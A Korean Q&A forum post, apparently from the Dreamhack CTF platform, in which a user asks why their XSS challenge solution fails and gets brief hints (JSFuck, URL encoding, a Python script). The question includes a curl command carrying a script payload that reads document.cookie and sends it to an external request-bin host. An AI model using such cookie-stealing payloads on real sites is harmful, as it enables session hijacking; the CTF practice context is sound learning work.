-
프론트엔드, /music에서 POST로 /save에 요청을 보내기전에 정규식을 활용하여 알파벳이랑, 특수문자를 필터링하기때문에, 백엔드 라우터인 /save로 바로 POST 요청으로 Flag를 보내게 해서 이거를 Dreamhack Tools로 Get요청을 하게하려고 했는데, 정상적으로 Reported!는 뜨는데 Tools로 요청이 들어오지 않아요 이유를 알려주시면 감사하겠습니다.
-
특수문자에 포함되지않는 기호인 JSFuck을 사용할려고도 했는데, 위 방법으로 문제를 풀어보고 싶어서요.
-
그리고 마지막으로 curl이나, console에서 직접적으로 POST 요청을 하였을때 DreamHack VM 서버가 자꾸 다운되는데 어떻게 해결하는지도 알려주시면 감사하겠습니다.
**curl -X POST -H "Content-Type: application/json" -d '{"url": "<script>(deep_cookie = document.cookie),fetch(\"/save\",{method:\"POST\",body:JSON.stringify({age:deep_cookie}),headers:{\"Content-Type\":\"application/json\"}}).then(response=>response.text()).then(data=>location.href=\"https://ynjlqqb.request.dreamhack.games/\"+data);</script>"}' http://host3.dreamhack.games:12833/report**
안녕하세요 Eunseok07Yang님
- 알파벳을 사용하지 못하기 때문에 JSFunc를 써야합니다. 그 문제가 아니라면, URL인코딩 문제일 수 있습니다.
- 다른 분들을 그렇게 풀이하신 듯 합니다.
- 파이썬으로 스크립트를 짜는 건 어떤가요?
지식을 나누고 포인트를 획득해보세요.
